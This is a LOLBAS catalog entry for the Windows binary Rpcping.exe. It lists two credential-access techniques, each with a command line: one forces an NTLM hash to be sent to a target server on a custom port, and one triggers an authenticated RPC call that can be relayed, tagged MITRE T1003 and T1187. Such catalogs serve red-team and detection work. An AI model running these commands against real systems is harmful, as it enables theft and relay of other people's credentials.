Catalog LOLBAS

LOL · Binary

Rpcping.exe

2 techniques WindowsLOLBAS GPL-3.0

Credentials

Credential Access Windows

Send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.

Use Capture credentials on a non-standard port

rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM
Context
user
Native
Credentials
MITRE
T1003

Credentials

Credential Access Windows

Trigger an authenticated RPC call to the target server (/s) that could be relayed to a privileged resource (Sign not Set).

Use Relay a NTLM authentication over RPC (ncacn_ip_tcp) on a custom port

rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM
Context
user
Native
Credentials
MITRE
T1187